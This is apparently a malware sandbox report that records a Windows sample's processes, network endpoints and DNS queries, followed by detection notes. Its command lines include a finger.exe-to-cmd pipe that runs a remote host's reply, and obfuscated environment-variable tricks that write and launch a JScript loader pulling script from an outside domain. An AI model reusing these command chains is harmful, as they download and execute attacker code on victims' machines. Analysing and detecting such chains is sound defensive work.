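Technical Information
The entries below are behaviour recorded while the sample ran: processes launched, the file written to disk, network endpoints and DNS queries, and the command lines involved. Host names containing '#' are partially masked as published. Read together, the command lines show finger.exe contacting a remote host on TCP port 79, its reply (with the leading lines skipped by `more +2`) piped into cmd.exe, and cmd.exe then stripping filler strings from environment variables to write %LOCALAPPDATA%\p9D.js, which is started with wscript.exe. For detection, the notable events are an outbound finger.exe connection on port 79, cmd.exe receiving piped input from it, and wscript.exe running a .js file from %LOCALAPPDATA%.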
- '<SYSTEM32>\finger.exe' ok@upot47lae89.employer.email
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\p9D.js"
- %LOCALAPPDATA%\p9d.js
- 'up######e89.employer.email':79
- 'wa####.#iwdwrsepcqr.date':80
- 'cl###flare.com':443
- 'microsoft.com':80
- 'up######e89.employer.email':79
- 'cl###flare.com':443
- DNS ASK up######e89.employer.email
- DNS ASK wa####.#iwdwrsepcqr.date
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c finger ok@upot47lae89.employer.email |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt LKCW=.j&&SEt KZZPF=vnPwyarnPwy a =nPwy 'scnPwyrinPwyptnPwy:'; b =nPwy 'hnPwyTtPnPwy:'; GnPwyetnPwyObjnPwyecnPwyt(nPwya+b+'&&sET NTI2=TJTRETJTREwaaa5d.eiwdwrsepcqr.dateTJTRE?1TJTRE')...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p MF2V2="%KZZPF:nPwy=%%NTI2:TJTRE=/%" 0<nul 1>%LOCALAPPDATA%\p9D%LKCW%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\p9D%LKCW%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\p9D.js